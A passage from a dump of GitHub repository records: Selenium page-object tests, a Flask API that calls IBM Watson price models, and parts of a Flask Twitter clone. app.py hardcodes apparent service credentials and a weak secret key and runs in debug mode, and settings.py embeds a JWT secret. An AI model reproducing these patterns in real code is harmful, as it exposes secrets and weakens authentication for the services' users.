bm_sentences_spacy_fast_en}\n bm.run(\"tok\", benchmarks)\n"
}
] | 19 |
Stalnyetapki/pattern_application_Page_Object
|
https://github.com/Stalnyetapki/pattern_application_Page_Object
|
1d5a422622bf4a0418e42bb2cb5b84bbee7fee09
|
07bedf123f0326c05a2462c40fade9b93726b8bb
|
e05c2cea3646711eafce287688e61e3b8dd8ce54
|
refs/heads/master
| 2021-06-21T20:56:56.598348 | 2019-07-02T22:59:40 | 2019-07-02T22:59:40 | 193,476,954 | 1 | 0 | null | 2019-06-24T09:40:09 | 2020-05-13T17:14:55 | 2021-04-20T18:15:10 |
Python
|
[
{
"alpha_fraction": 0.6844783425331116,
"alphanum_fraction": 0.6870229244232178,
"avg_line_length": 28.11111068725586,
"blob_id": "57cf70b01dd041260a097b4c273985f21184ef5a",
"content_id": "511b47e87c1f1552aacf3017fae4826495eacc40",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 802,
"license_type": "no_license",
"max_line_length": 61,
"num_lines": 27,
"path": "/test_main_page.py",
"repo_name": "Stalnyetapki/pattern_application_Page_Object",
"src_encoding": "UTF-8",
"text": "from .pages.main_page import MainPage\nfrom .pages.login_page import LoginPage\n\n\ndef test_guest_can_go_to_login_page(driver):\n link = \"http://selenium1py.pythonanywhere.com/\"\n page = MainPage(driver, link)\n page.open()\n # возвращать нужный Page Object\n # login_page = page.go_to_login_page()\n # login_page.should_be_login_page()\n login_page = LoginPage(driver, driver.current_url)\n login_page.should_be_login_page()\n\n\ndef go_to_login_page(driver):\n link = driver.find_element_by_css_selector(\"#login_link\")\n link.click()\n alert = driver.switch_to.alert\n alert.accept()\n\n\ndef test_guest_should_see_login_link(driver):\n link = \"http://selenium1py.pythonanywhere.com/\"\n page = MainPage(driver, link)\n page.open()\n page.should_be_login_link()\n"
},
{
"alpha_fraction": 0.7164846062660217,
"alphanum_fraction": 0.7164846062660217,
"avg_line_length": 54.94444274902344,
"blob_id": "a4435fe8355c8390ac3512ca00f97707a3509fa7",
"content_id": "7f72881db0a2f911802678ebfdc7e6e18fc740fd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2014,
"license_type": "no_license",
"max_line_length": 119,
"num_lines": 36,
"path": "/pages/product_page.py",
"repo_name": "Stalnyetapki/pattern_application_Page_Object",
"src_encoding": "UTF-8",
"text": "from .base_page import BasePage\nfrom .locators import ProductPageLocators\n\n\nclass ProductPage(BasePage):\n\n def take_product_name(self):\n product = self.driver.find_element(*ProductPageLocators.PRODUCT_NAME)\n return product.text\n\n def take_product_price(self):\n price = self.driver.find_element(*ProductPageLocators.PRODUCT_PRICE)\n return price.text\n\n def press_button_add_in_basket(self):\n button_add_in_basket = self.driver.find_element(*ProductPageLocators.BUTTON_ADD_IN_BASKET)\n button_add_in_basket.click()\n\n def should_be_product_name_in_adding_message(self, name):\n assert self.is_element_present(*ProductPageLocators.PRODUCT_NAME)\n product = self.driver.find_element(*ProductPageLocators.PRODUCT_NAME)\n assert self.is_element_present(*ProductPageLocators.PRODUCT_NAME_IN_MESSAGE)\n name_in_message = self.driver.find_element(*ProductPageLocators.PRODUCT_NAME_IN_MESSAGE)\n assert product.text == name_in_message.text, f\"{product.text} does not match {name_in_message.text}\"\n assert name == name_in_message.text, f\"added {name} on adding page, but in basket added {name_in_message.text}\"\n assert name == product.text, f\"added {name} on adding page, but after name of product was {product.text}\"\n\n def should_be_price_of_product_in_basket_value(self, price):\n assert self.is_element_present(*ProductPageLocators.PRODUCT_PRICE)\n product_price = self.driver.find_element(*ProductPageLocators.PRODUCT_PRICE)\n assert self.is_element_present(*ProductPageLocators.PRICE_IN_MESSAGE)\n price_in_message = self.driver.find_element(*ProductPageLocators.PRICE_IN_MESSAGE)\n assert product_price.text == price_in_message.text, \"product price does not match basket price\"\n assert price == price_in_message.text, \\\n \"product price on adding page does not match basket price when product added\"\n assert price == product_price.text, f\"{price} != {product_price}\"\n"
},
{
"alpha_fraction": 0.6961602568626404,
"alphanum_fraction": 0.6994991898536682,
"avg_line_length": 43.37036895751953,
"blob_id": "c3cad43a0d446cafae54e47c28a68581fb60b57c",
"content_id": "8a60c87e28c1be71d8bef1970330ec67c2d34952",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1198,
"license_type": "no_license",
"max_line_length": 103,
"num_lines": 27,
"path": "/pages/locators.py",
"repo_name": "Stalnyetapki/pattern_application_Page_Object",
"src_encoding": "UTF-8",
"text": "from selenium.webdriver.common.by import By\n\n\nclass MainPageLocators:\n LOGIN_LINK = (By.CSS_SELECTOR, \"#login_link\")\n\n\nclass LoginPageLocators:\n LOGIN_FORM = (By.ID, \"login_form\")\n EMAIL_INPUT_LOGIN_FORM = (By.CLASS_NAME, \"login-username\")\n PASSWORD_INPUT_LOGIN_FORM = (By.CLASS_NAME, \"login-password\")\n PASSWORD_LINK_LOGIN_FORM = (By.CSS_SELECTOR, \"p > a\")\n BUTTON_SUBMIT_LOGIN_FORM = (By.CLASS_NAME, \"login_submit\")\n\n REGISTRATION_FORM = (By.ID, \"register_form\")\n EMAIL_INPUT_REGISTRATION_FORM = (By.CLASS_NAME, \"registration-email\")\n PASSWORD_INPUT_REGISTRATION_FORM = (By.CLASS_NAME, \"registration-password1\")\n REPEAT_PASSWORD_INPUT_REGISTRATION_FORM = (By.CLASS_NAME, \"registration-password2\")\n BUTTON_SUBMIT_REGISTRATION_FORM = (By.CLASS_NAME, \"registration_submit\")\n\n\nclass ProductPageLocators:\n BUTTON_ADD_IN_BASKET = (By.CSS_SELECTOR, \".btn-add-to-basket\")\n PRODUCT_NAME = (By.CSS_SELECTOR, \".product_main > h1\")\n PRODUCT_PRICE = (By.CSS_SELECTOR, \".product_main > .price_color\")\n PRODUCT_NAME_IN_MESSAGE = (By.CSS_SELECTOR, \".alert-success:nth-child(1) div.alertinner > strong\")\n PRICE_IN_MESSAGE = (By.CSS_SELECTOR, \".alert-info strong\")\n"
},
{
"alpha_fraction": 0.7100840210914612,
"alphanum_fraction": 0.7100840210914612,
"avg_line_length": 33,
"blob_id": "5162cb656307b40eda5449d82b53ce7264f23c50",
"content_id": "47bc786ce465ada6b22c485af9f3a72bb1533ad5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 492,
"license_type": "no_license",
"max_line_length": 99,
"num_lines": 14,
"path": "/pages/main_page.py",
"repo_name": "Stalnyetapki/pattern_application_Page_Object",
"src_encoding": "UTF-8",
"text": "from .base_page import BasePage\nfrom .locators import MainPageLocators\n\n\nclass MainPage(BasePage):\n\n def go_to_login_page(self):\n link = self.driver.find_element(*MainPageLocators.LOGIN_LINK)\n link.click()\n # возвращать нужный Page Object\n # return LoginPage(driver=self.driver, url=self.driver.current_url)\n\n def should_be_login_link(self):\n assert self.is_element_present(*MainPageLocators.LOGIN_LINK), \"Login link is not presented\"\n"
},
{
"alpha_fraction": 0.6122787594795227,
"alphanum_fraction": 0.6421459913253784,
"avg_line_length": 68.42308044433594,
"blob_id": "26d7363766e9654dca5b508c38a76baec4d58307",
"content_id": "2f215c4be83cf2550c608964807aa6b0bb669650",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1808,
"license_type": "no_license",
"max_line_length": 118,
"num_lines": 26,
"path": "/test_product_page.py",
"repo_name": "Stalnyetapki/pattern_application_Page_Object",
"src_encoding": "UTF-8",
"text": "from .pages.product_page import ProductPage\nimport pytest\n\n\nlink = \"http://selenium1py.pythonanywhere.com/catalogue/coders-at-work_207/\"\n\n\[email protected]('link', [\"http://selenium1py.pythonanywhere.com/catalogue/coders-at-work_207/?promo=offer0\",\n \"http://selenium1py.pythonanywhere.com/catalogue/coders-at-work_207/?promo=offer1\",\n \"http://selenium1py.pythonanywhere.com/catalogue/coders-at-work_207/?promo=offer2\",\n \"http://selenium1py.pythonanywhere.com/catalogue/coders-at-work_207/?promo=offer3\",\n \"http://selenium1py.pythonanywhere.com/catalogue/coders-at-work_207/?promo=offer4\",\n \"http://selenium1py.pythonanywhere.com/catalogue/coders-at-work_207/?promo=offer5\",\n \"http://selenium1py.pythonanywhere.com/catalogue/coders-at-work_207/?promo=offer6\",\n \"http://selenium1py.pythonanywhere.com/catalogue/coders-at-work_207/?promo=offer7\",\n \"http://selenium1py.pythonanywhere.com/catalogue/coders-at-work_207/?promo=offer8\",\n \"http://selenium1py.pythonanywhere.com/catalogue/coders-at-work_207/?promo=offer9\"])\ndef test_guest_can_add_product_to_cart(driver, link):\n product_page = ProductPage(driver, link)\n product_page.open()\n product_page.take_product_name()\n product_page.take_product_price()\n product_page.press_button_add_in_basket()\n product_page.solve_quiz_and_get_code()\n product_page.should_be_product_name_in_adding_message(name=product_page.take_product_name())\n product_page.should_be_price_of_product_in_basket_value(price=product_page.take_product_price())\n\n\n\n"
}
] | 5 |
ahmedkmadani/WatsonAPI
|
https://github.com/ahmedkmadani/WatsonAPI
|
3d781ffffacbf6bc908744901ad5e450533cf366
|
09a64700f0f4b0a4501c7d9689d85e051f7e1de5
|
c88378579e3a14e6cefd2587cd2e746e4aab9541
|
refs/heads/master
| 2021-06-12T09:23:18.253989 | 2019-06-27T13:06:16 | 2019-06-27T13:06:16 | 188,440,083 | 0 | 0 |
Apache-2.0
| 2019-05-24T14:52:54 | 2019-06-27T13:06:56 | 2021-06-01T23:46:52 |
Python
|
[
{
"alpha_fraction": 0.8058252334594727,
"alphanum_fraction": 0.8058252334594727,
"avg_line_length": 50.5,
"blob_id": "7416dd73890fb42d3f5e74379b50c12eb8f93745",
"content_id": "27eb8a36671a534ec640e975931a33eaadbc5419",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 103,
"license_type": "permissive",
"max_line_length": 90,
"num_lines": 2,
"path": "/README.md",
"repo_name": "ahmedkmadani/WatsonAPI",
"src_encoding": "UTF-8",
"text": "# WatsonAPI\nFlask API to get price from IBM watson to predict yam price after inserting Month and year\n"
},
{
"alpha_fraction": 0.4956521689891815,
"alphanum_fraction": 0.7043478488922119,
"avg_line_length": 15.571428298950195,
"blob_id": "3be7b1672995a41be3bf8e2c9d7f1b75370925eb",
"content_id": "4188f3a78b8ef76bd81aa210c1c3722f3ead2a31",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 115,
"license_type": "permissive",
"max_line_length": 18,
"num_lines": 7,
"path": "/requirements.txt",
"repo_name": "ahmedkmadani/WatsonAPI",
"src_encoding": "UTF-8",
"text": "Flask==1.0.2\nFrozen-Flask==0.15\ngunicorn==19.0.0\nurllib3==1.22\njsonschema==3.0.1\nrequests==2.18.4\nFlask-Cors==3.0.7"
},
{
"alpha_fraction": 0.6362301111221313,
"alphanum_fraction": 0.6780905723571777,
"avg_line_length": 39.05882263183594,
"blob_id": "8ea1a4353a867cc59de62bc914ab58c4d30f75d8",
"content_id": "fe78c03ba4ef7162f7b775ab7b6b1f53d42fd28b",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4085,
"license_type": "permissive",
"max_line_length": 218,
"num_lines": 102,
"path": "/app.py",
"repo_name": "ahmedkmadani/WatsonAPI",
"src_encoding": "UTF-8",
"text": "#Price Model Predection using IBM Watson\nfrom flask import Flask, request, jsonify\nfrom flask_cors import CORS\nimport urllib3, json, requests, calendar\n\napp = Flask(__name__)\nCORS(app)\n\n#IBM Watson Credenials \nwml_credentials={\n \"url\":'https://eu-gb.ml.cloud.ibm.com',\n \"username\": '461336f2-8984-492a-b72a-9376b8e9d1c2',\n \"password\": 'de3136e2-2a65-48cd-85f7-77dd03715ba3'\n }\n\n#init header and request and getting response \nheaders = urllib3.util.make_headers(basic_auth='{username}:{password}'.format(username=wml_credentials['username'], password=wml_credentials['password']))\nurl = '{}/v3/identity/token'.format(wml_credentials['url'])\nresponse = requests.get(url, headers=headers)\nmltoken = json.loads(response.text).get('token')\n\nheader = {'Content-Type': 'application/json', 'Authorization': 'Bearer ' + mltoken}\n\[email protected]('/price/v1', methods=['GET', 'POST'])\ndef getPrice():\n #getting month and year from POST request\n month = request.args.get('month')\n year = request.args.get('year')\n\n payload_scoring = {\"fields\":[\"MONTH\",\"YEAR\"],\"values\":[[int(month),int(year)]]}\n response_scoring = requests.post('https://eu-gb.ml.cloud.ibm.com/v3/wml_instances/6a216236-adcc-48b5-901f-41e4cafbf033/deployments/1d441776-58fb-4e22-8975-aa9b1c4a40a9/online', json=payload_scoring, headers=header)\n print(\"Scoring response\")\n print(json.loads(response_scoring.text)) \n response = json.loads(response_scoring.text)\n\n #get result from the response \n month_num = int(response['values'][0][0])\n month = calendar.month_name[month_num]\n year = str(response['values'][0][1])\n pre_prams = str(response['values'][0][2])\n price_round = (\"%.2f\" % round(response['values'][0][3],2))\n price = str(price_round + \" GHS (250KG)\")\n\n return jsonify(month=month,year=year,pre_prams=pre_prams,price=price)\n\n\n\[email protected]('/price/v2', methods=['GET', 'POST'])\ndef getPriceV2():\n #getting month and year from POST request\n month = request.args.get('month')\n year = request.args.get('year')\n temp = request.args.get('temp')\n rain = request.args.get('rain')\n\n payload_scoring = {\"fields\":[\"MONTH\",\"YEAR\",\"TEMP\",\"Rainfall - (MM)\"],\"values\":[[int(month),int(year),float(temp),float(rain)]]}\n\n response_scoring = requests.post('https://eu-gb.ml.cloud.ibm.com/v3/wml_instances/6a216236-adcc-48b5-901f-41e4cafbf033/deployments/dab8060f-b1f4-49d7-bd69-8ca833cc2d3d/online', json=payload_scoring, headers=header)\n print(\"Scoring response\")\n print(json.loads(response_scoring.text))\n response = json.loads(response_scoring.text)\n\n #get result from the response \n month_num = int(response['values'][0][0])\n month = calendar.month_name[month_num]\n year = str(response['values'][0][1])\n pre_prams = str(response['values'][0][2])\n price_round = (\"%.2f\" % round(response['values'][0][3],2))\n price = str(price_round + \" GHS\")\n\n return jsonify(month=month,year=year,pre_prams=pre_prams,price=price)\n\n\n\[email protected]('/price/v3', methods=['GET', 'POST'])\ndef getPriceV3():\n #getting crop , month and year from POST request\n month = request.args.get('month')\n year = request.args.get('year')\n crop = request.args.get('crop')\n\n\n payload_scoring = {\"fields\":[\"YEAR\",\"MONTH\",\"CROP\"],\"values\":[[int(year),int(month),int(crop)]]}\n response_scoring = requests.post('https://eu-gb.ml.cloud.ibm.com/v3/wml_instances/6a216236-adcc-48b5-901f-41e4cafbf033/deployments/a4263b57-a6f0-4592-83ac-68f2625647f3/online', json=payload_scoring, headers=header)\n 
print(\"Scoring response\")\n print(json.loads(response_scoring.text)) \n response = json.loads(response_scoring.text)\n\n # get result from the response \n year = int(response['values'][0][0])\n month_num = int(response['values'][0][1])\n month = calendar.month_name[month_num]\n crop = int(response['values'][0][2])\n price_round = (\"%.2f\" % round(response['values'][0][4]))\n price = str(price_round + \" GHS\")\n\n # return str(response)\n return jsonify(month=month,year=year,price=price,crop=crop)\n\nif __name__ == '__main__':\n app.secret_key='secret123'\n app.run(debug=True)"
}
] | 3 |
mongodb-ansible-roles/ansible-role-sudoers-d
|
https://github.com/mongodb-ansible-roles/ansible-role-sudoers-d
|
f599fa5356f939984e19c9a6df8bda4605af927d
|
8e23a5165f6ab528a26554746aee658cefee9159
|
720e997bf4d32457ec792dcaf76a8502bef470d9
|
refs/heads/master
| 2021-01-08T07:31:30.027241 | 2020-02-20T18:48:12 | 2020-02-20T18:48:12 | 241,956,675 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.7322834730148315,
"alphanum_fraction": 0.7322834730148315,
"avg_line_length": 20.16666603088379,
"blob_id": "92e129df28bb1ac77c957c62f20e31e1e00ff35c",
"content_id": "e5814478880d6f25ee2ee280dc8e8402d8713da9",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 254,
"license_type": "permissive",
"max_line_length": 63,
"num_lines": 12,
"path": "/molecule/default/tests/test_default.py",
"repo_name": "mongodb-ansible-roles/ansible-role-sudoers-d",
"src_encoding": "UTF-8",
"text": "import os\n\nimport testinfra.utils.ansible_runner\n\ntestinfra_hosts = testinfra.utils.ansible_runner.AnsibleRunner(\n os.environ['MOLECULE_INVENTORY_FILE']\n).get_hosts('all')\n\n\ndef test_sudo(host):\n cmd = host.run(\"sudo pwd\")\n assert cmd.succeeded\n"
},
{
"alpha_fraction": 0.5903361439704895,
"alphanum_fraction": 0.7584033608436584,
"avg_line_length": 35.61538314819336,
"blob_id": "3a84edd71a97c7fa68388a0ee91f92ce20be9178",
"content_id": "edad9c9d91fa8d38cef461c1747bf07642d3a57d",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 476,
"license_type": "permissive",
"max_line_length": 165,
"num_lines": 13,
"path": "/CHANGELOG.md",
"repo_name": "mongodb-ansible-roles/ansible-role-sudoers-d",
"src_encoding": "UTF-8",
"text": "## [1.0.1](https://github.com/mongodb-ansible-roles/ansible-role-sudoers-d/compare/v1.0.0...v1.0.1) (2020-02-20)\n\n\n### Bug Fixes\n\n* Added missing RHEL network signon step ([a203915](https://github.com/mongodb-ansible-roles/ansible-role-sudoers-d/commit/a20391546a2dea2b4abe83aaef30f11baf034c9d))\n\n# 1.0.0 (2020-02-20)\n\n\n### Features\n\n* Initial commit ([f869dcf](https://github.com/mongodb-ansible-roles/ansible-role-sudoers-d/commit/f869dcf64f4c73cdbe79c880c9067f208dab10bc))\n"
},
{
"alpha_fraction": 0.6105726957321167,
"alphanum_fraction": 0.6211453676223755,
"avg_line_length": 25.395349502563477,
"blob_id": "68a3d2503467aef80f6c9a18a5ec1a4508ba384d",
"content_id": "4821c1832bc6c56099b44c9722542caa4e7cf263",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1135,
"license_type": "permissive",
"max_line_length": 230,
"num_lines": 43,
"path": "/README.md",
"repo_name": "mongodb-ansible-roles/ansible-role-sudoers-d",
"src_encoding": "UTF-8",
"text": "Ansible role for sudoers-d\n==================================\n\nAdd entries to sudoers drop in directory\n\n[](https://github.com/mongodb-ansible-roles/ansible-role-sudoers-d/actions?query=workflow%3A%22Molecule+Test%22)\n[](https://github.com/mongodb-ansible-roles/ansible-role-sudoers-d/actions?query=workflow%3A%22Release%22)\n\nRequirements\n------------\n\nNone\n\nRole Variables\n--------------\n\n| Name | Description | Type | Default | Required |\n|------|-------------|:----:|:-------:|:--------:|\n| `sudoers_commands` | Array of files to add to /etc/sudoers.d/ directory | array | \"\" | yes |\n\nDependencies\n------------\n\nNone\n\nExample Playbook\n----------------\n\n```yaml\n- hosts: all\n roles:\n - role: ansible-role-sudoers-d\n vars:\n sudoers_commands:\n - user: test_user\n commands: /usr/bin/pwd\n dest: /etc/sudoers.d/pwd\n```\n\nLicense\n-------\n\n[Apache License](LICENSE)\n"
}
] | 3 |
wishabhilash/mhtwitter
|
https://github.com/wishabhilash/mhtwitter
|
2a5023d661335d8bcd12bd77e2df39e42576f332
|
05761833ca0268ca43a98f03180c5739f12503a7
|
91089d081ed10a2c780e294bbe2911b48d39a4b5
|
refs/heads/master
| 2020-04-01T18:49:16.717505 | 2018-10-21T17:46:07 | 2018-10-21T17:46:07 | 153,516,634 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.580471396446228,
"alphanum_fraction": 0.5878787636756897,
"avg_line_length": 26,
"blob_id": "b95b902bfdd2854716386390e2bd244af8d33762",
"content_id": "977086435888f92674472167cc3a0e6ba15a6cd0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 1485,
"license_type": "no_license",
"max_line_length": 96,
"num_lines": 55,
"path": "/src/ui/js/views.js",
"repo_name": "wishabhilash/mhtwitter",
"src_encoding": "UTF-8",
"text": "'use strict';\nimport {UserService, TweetService, FollowerService} from \"/asset/js/services.js\";\n\nexport default class DefaultView {\n constructor(oid) {\n this.userService = new UserService();\n this.tweetService = new TweetService();\n this.followerService = new FollowerService();\n\n this.accessToken = localStorage.getItem('accessToken', null);\n if (!this.accessToken) {\n this.goToSignin();\n }\n\n if (oid == undefined) {\n oid = this.parseJwt(this.getAccessToken()).identity;\n }\n\n this._setupView(oid)\n }\n\n getAccessToken() {\n return this.accessToken;\n }\n\n _setupView(oid) {\n // TO BE IMPLEMENTED\n }\n\n _setupUserProfile(data) {\n $('.header .name h4').html(`<a href=\"/user/${data.oid}\">${data.name.toUpperCase()}</a>`)\n $('.header .email h6').html(data.email)\n }\n\n _setupUserSuggestions(data) {\n let userSuggestions = this._renderUserCell(data);\n $('.user-suggestions .users-list').html(userSuggestions);\n }\n\n parseJwt (token) {\n var base64Url = token.split('.')[1];\n var base64 = base64Url.replace('-', '+').replace('_', '/');\n return JSON.parse(window.atob(base64));\n };\n\n goToSignin() {\n window.location = \"/?show=signin\";\n }\n\n getSignedInUserOid() {\n this.accessToken = localStorage.getItem('accessToken', null);\n return this.parseJwt(this.accessToken).identity;\n }\n\n}\n"
},
{
"alpha_fraction": 0.550148606300354,
"alphanum_fraction": 0.5557206273078918,
"avg_line_length": 33.52564239501953,
"blob_id": "45f654cfd4c8f80835690644c29bbae47491e762",
"content_id": "386bff2bf54f8d1b43824e2516d0a3e4ab12fd99",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2692,
"license_type": "no_license",
"max_line_length": 98,
"num_lines": 78,
"path": "/src/views/follower.py",
"repo_name": "wishabhilash/mhtwitter",
"src_encoding": "UTF-8",
"text": "from src.views.base import BaseView\nfrom src import models\nfrom flask import request\nfrom flask_jwt_extended import jwt_required\n\nclass Follower(BaseView):\n\n @jwt_required\n def get(self, oid):\n return self._get_followers_of_user(oid)\n\n def _get_followers_of_user(self, oid):\n user = models.User().get_by_oid(oid)\n if user is None:\n return self._404(\"User doesn't exist.\")\n\n followers = models.Follower().get_by_user(user)\n result = []\n for follower in followers:\n result.append({\n 'name': follower.follower.name,\n 'email': follower.follower.email,\n 'oid': follower.follower.oid\n })\n return self._success(result)\n\n @jwt_required\n def post(self):\n args = request.form\n if not ('leader_oid' in args and 'follower_oid' in args):\n return self._404(\"Invalid data.\") \n return self._create_follower(args)\n\n def _create_follower(self, args):\n if args['leader_oid'] == args['follower_oid']:\n return self._404(\"User can't follow ownself.\")\n \n leader_user = models.User().get_by_oid(args['leader_oid'])\n follower_user = models.User().get_by_oid(args['follower_oid'])\n \n followerObj = models.Follower()\n followerExists = followerObj.query.filter(\n models.Follower.leader==leader_user,\n models.Follower.follower==follower_user\n ).all()\n if not followerExists:\n follower = models.Follower().create_follower(args['leader_oid'], args['follower_oid'])\n return self._success()\n else:\n return self._404(\"User is already a follower\")\n\n\nclass FollowerTweets(BaseView):\n\n @jwt_required\n def get(self, oid):\n return self._get_tweets_of_followers(oid)\n\n def _get_tweets_of_followers(self, oid):\n user = models.User().get_by_oid(oid)\n if user is None:\n return self._404(\"User doesn't exist.\")\n\n followers = models.Follower().get_by_user(user)\n tweets = []\n for follower in followers:\n for tweet in follower.follower.tweets:\n tweets.append({\n 'created_at': tweet.created_at,\n 'tweet': tweet.tweet,\n 'oid': tweet.oid,\n 'follower': {\n 'name': follower.follower.name,\n 'email': follower.follower.email,\n 'oid': follower.follower.oid\n }\n })\n return self._success(list(reversed(sorted(tweets, key=lambda x: x['created_at']))))"
},
{
"alpha_fraction": 0.6881029009819031,
"alphanum_fraction": 0.6881029009819031,
"avg_line_length": 37.875,
"blob_id": "76f4a3c1a1b43039c8232db236846ad7f624f106",
"content_id": "478e4f3760d613a8fdd6d762dfc7ba64b2de4ee8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 933,
"license_type": "no_license",
"max_line_length": 81,
"num_lines": 24,
"path": "/src/models/follower.py",
"repo_name": "wishabhilash/mhtwitter",
"src_encoding": "UTF-8",
"text": "from src import db, app\nfrom src.models.base import BaseModel\nfrom sqlalchemy.orm import validates, relationship\nfrom sqlalchemy.ext.hybrid import hybrid_property\nfrom src import models\n\nclass Follower(BaseModel, db.Model):\n leader_id = db.Column(db.Integer, db.ForeignKey('user.id'), nullable=False)\n follower_id = db.Column(db.Integer, db.ForeignKey('user.id'), nullable=False)\n\n leader = relationship('User', foreign_keys=[leader_id])\n follower = relationship('User', foreign_keys=[follower_id])\n\n def get_by_user(self, user):\n followers = self.query.filter(Follower.leader_id == user.id).all()\n return followers\n \n def create_follower(self, leader_oid, follower_oid):\n leader = models.User().get_by_oid(leader_oid)\n follower = models.User().get_by_oid(follower_oid)\n self.leader_id = leader.id\n self.follower_id = follower.id\n self.save()\n return self\n"
},
{
"alpha_fraction": 0.6127167344093323,
"alphanum_fraction": 0.6242774724960327,
"avg_line_length": 25,
"blob_id": "7b2b29af52632ecd1080c7a5cf30cdce99f19823",
"content_id": "238b626c2eb80bc7a25fbbbc9d442916b22f04b8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 519,
"license_type": "no_license",
"max_line_length": 75,
"num_lines": 20,
"path": "/src/settings.py",
"repo_name": "wishabhilash/mhtwitter",
"src_encoding": "UTF-8",
"text": "import sys, os\n\n\nclass Config(object):\n BASE_PATH = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n SQLALCHEMY_DATABASE_URI = \"sqlite:///%s/twitter.sqlite\" % BASE_PATH\n SQLALCHEMY_TRACK_MODIFICATIONS = False\n\n TWEET_CHARACTER_LIMIT = 280\n ACCESS_TOKEN_EXPIRY = 7 #days\n REFRESH_TOKEN_EXPIRY = 30 #days\n\n JWT_SECRET_KEY = \"$6$DXKKMwci96tYMW3C\"\n\n\n DATETIME_FORMAT = \"%Y-%m-%dT%H:%M:%S\"\n DATE_FORMAT = \"%Y-%m-%d\"\n TIME_FORMAT = \"%H:%M:%S\"\n\n STATIC_PATH = os.path.join(BASE_PATH, 'src', 'ui')"
},
{
"alpha_fraction": 0.5254386067390442,
"alphanum_fraction": 0.530701756477356,
"avg_line_length": 29.594594955444336,
"blob_id": "0844978f0b164593ceed43d2d2fc9bdd2befa7b0",
"content_id": "b65893979f91e0df6843f2599531c298db526659",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1140,
"license_type": "no_license",
"max_line_length": 62,
"num_lines": 37,
"path": "/src/views/tweet.py",
"repo_name": "wishabhilash/mhtwitter",
"src_encoding": "UTF-8",
"text": "from src.views.base import BaseView\nfrom src import models\nfrom flask import request\nfrom flask_jwt_extended import jwt_required\n\nclass Tweet(BaseView):\n\n @jwt_required\n def get(self, oid):\n return self._get_tweets_of_user(oid)\n\n def _get_tweets_of_user(self, oid):\n user = models.User().get_by_oid(oid)\n tweets = []\n if user.tweets is not None:\n for t in user.tweets:\n tweets.append({\n 'created_at': t.created_at,\n 'tweet': t.tweet,\n 'oid': t.oid,\n 'name': user.name,\n 'email': user.email\n })\n return self._success(list(reversed(tweets)))\n\n @jwt_required\n def post(self):\n args = request.form\n user = models.User().get_by_oid(args['oid'])\n if user is None:\n return self._404(\"User doesn't exist.\")\n tweet = models.Tweet(user, args['content'])\n try:\n tweet.save()\n except Exception as e:\n return self._404('Encountered error while saving')\n return self._success()\n "
},
{
"alpha_fraction": 0.5104477405548096,
"alphanum_fraction": 0.5104477405548096,
"avg_line_length": 22.769229888916016,
"blob_id": "2478db0fcfe37c8670ab43a97471ff669474c2f6",
"content_id": "0be0e1d8d1fd5b5f91b74c72a4b8d4ed7ebadbc4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 335,
"license_type": "no_license",
"max_line_length": 84,
"num_lines": 13,
"path": "/src/views/__init__.py",
"repo_name": "wishabhilash/mhtwitter",
"src_encoding": "UTF-8",
"text": "import os\nfrom src import app\n\nclass StaticMixin(object):\n \n def _get_file(self, filepath):\n content = \"\"\n try:\n content = open(os.path.join(app.config['STATIC_PATH'], filepath)).read()\n except Exception as e:\n print(e)\n pass\n return content\n \n \n "
},
{
"alpha_fraction": 0.7542856931686401,
"alphanum_fraction": 0.7599999904632568,
"avg_line_length": 16.600000381469727,
"blob_id": "53313c991bab403a7f63018ed4d1b20ea7abc422",
"content_id": "2da9c76a91b1aab4b986508424b20bf01e23df18",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 175,
"license_type": "no_license",
"max_line_length": 35,
"num_lines": 10,
"path": "/deploy.sh",
"repo_name": "wishabhilash/mhtwitter",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n\n# Create python virtual environment\nvirtualenv --python=python3 .venv\n. .venv/bin/activate\n# END\n\n# Install requirements.txt\npip install -r requirements.txt\n# END"
},
{
"alpha_fraction": 0.7217391133308411,
"alphanum_fraction": 0.7217391133308411,
"avg_line_length": 15.428571701049805,
"blob_id": "d225e96aabc36272a291069c616c5d1a3f57657a",
"content_id": "3072d2dbbb80a6dbf2b1f95b9bf810467f2a1bba",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 115,
"license_type": "no_license",
"max_line_length": 24,
"num_lines": 7,
"path": "/src/commands.py",
"repo_name": "wishabhilash/mhtwitter",
"src_encoding": "UTF-8",
"text": "from src import app, db\nimport click\nfrom src.models import *\n\[email protected]()\ndef createdb():\n\tdb.create_all()\n"
},
{
"alpha_fraction": 0.575129508972168,
"alphanum_fraction": 0.590673565864563,
"avg_line_length": 28,
"blob_id": "3695b71e926c5b1fb1766eb02003113a797fbe7a",
